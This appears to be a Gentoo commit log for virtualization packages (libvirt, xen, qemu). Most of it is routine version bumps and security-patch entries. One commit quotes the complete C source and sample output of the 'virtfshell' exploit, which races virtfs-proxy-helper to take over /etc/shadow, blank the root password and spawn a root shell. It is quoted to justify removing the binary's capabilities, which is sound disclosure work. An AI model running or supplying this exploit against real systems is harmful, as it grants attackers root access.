| Commit message (Collapse) | Author | Age | Files | Lines |
|---|
| |
|
|
|
|
| |
Gentoo-Bug: #568154
Package-Manager: portage-2.2.26
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
| |
|
|
|
|
|
|
| |
This is a cleanup for CVE-2015-5313 bug 568870.
Gentoo-Bugs: 568870
Package-Manager: portage-2.2.26
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
|
|
|
| |
This is a cleanup for CVE-2015-5313 bug 568870.
Gentoo-Bugs: 568870
Package-Manager: portage-2.2.26
|
| |
|
|
|
|
|
|
|
|
|
|
| |
Apply fix for CVE-2015-5313 to 1.2.21:
A path-traversal flaw was found in the way the libvirt daemon handled
file-system names for storage volumes. A libvirt user with privileges to
create storage volumes and without privileges to create and modify
domains could possibly use this flaw to escalate their privileges.
Gentoo-Bug: 568870
Package-Manager: portage-2.2.26
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
| |
Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
|
| |
|
|
|
| |
Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
|
| | |
|
| |
|
|
| |
Package-Manager: portage-2.2.24
|
| |
|
|
| |
Package-Manager: portage-2.2.24
|
| | |
|
| | |
|
| | |
|
| |
|
|
|
|
|
|
| |
security patches added of xsa 164,165,166 re security Bug 567962
Gentoo bug: #567962
Package-Manager: portage-2.2.24
|
| |
|
|
|
|
|
|
|
| |
security patches added of xsa 164,165,166, and those effecting qemu (4)
from xsa-155 re security Bug 567962
Gentoo bug: #567962
Package-Manager: portage-2.2.24
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| | |
|
| | |
|
| |
|
|
|
| |
Package-Manager: portage-2.2.20.1
Signed-off-by: Richard Yao <ryao@gentoo.org>
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
| |
|
|
|
|
| |
Gentoo-Bug: 567654
Package-Manager: portage-2.2.26
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
| |
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --force
|
| |
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --force
|
| |
|
|
|
|
|
| |
Note: line 3 in previous commit re adding sec patches should read;
Addition of patches XSA-158 (#566844), XSA-{159,160} (#566842)
Package-Manager: portage-2.2.24
|
| |
|
|
| |
Package-Manager: portage-2.2.24
|
| |
|
|
|
|
|
|
|
|
|
|
| |
Addition of patches XSA-158 (#566844), XSA-{159,160} (#566842), fixing all
corresponding security issues, patches made avaialable for public release
as of yesterday (08/12). Patches compressed into my devspace then combined
with those of dlan insource. This format will do for now. Not to be
adjusted without prior discussion. All patches pass runtests
Gentoo bugs: #566842 #566844
Package-Manager: portage-2.2.24
|
| |
|
|
| |
Package-Manager: portage-2.2.24
|
| |
|
|
|
|
|
|
|
|
|
|
| |
Addition of patches XSA-158 (#566842), XSA-158 (#566844), fixing all
corresponding security issues, patches made avaialable for public release
as of yesterday (08/12). Patches compressed into my devspace then combined
with those of dlan insource. This format will do for now. Not to be
adjusted without prior discussion. All patches pass runtests.
Gentoo bugs: #566842 #566844
Package-Manager: portage-2.2.24
|
| | |
|
| | |
|
| | |
|
| | |
|
| |
|
|
| |
Package-Manager: portage-2.2.24
|
| |
|
|
|
|
| |
bump to latest upstream release.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
|
| |
|
|
|
|
|
| |
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
|
| |
|
|
|
|
|
| |
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
|
| |
|
|
|
| |
This reverts commit 8a11081f495114c5ddfb54a8cef9285d6d7aa878. The
sub-slot needs to only be on app-emulation/xen-tools.
|
| |
|
|
| |
Package-Manager: portage-2.2.26
|
Manuel Rüger
Matthias Maier
Agostino Sarubbo
Lars Wendler
Mike Frysinger
Michael Sterrett
Ian Delaney
Richard Yao
Jason A. Donenfeld
Erik Mackdanz
Alex Brandt
Robin H. Johnson
Doug Goldstein
Zac Medico
GitWeb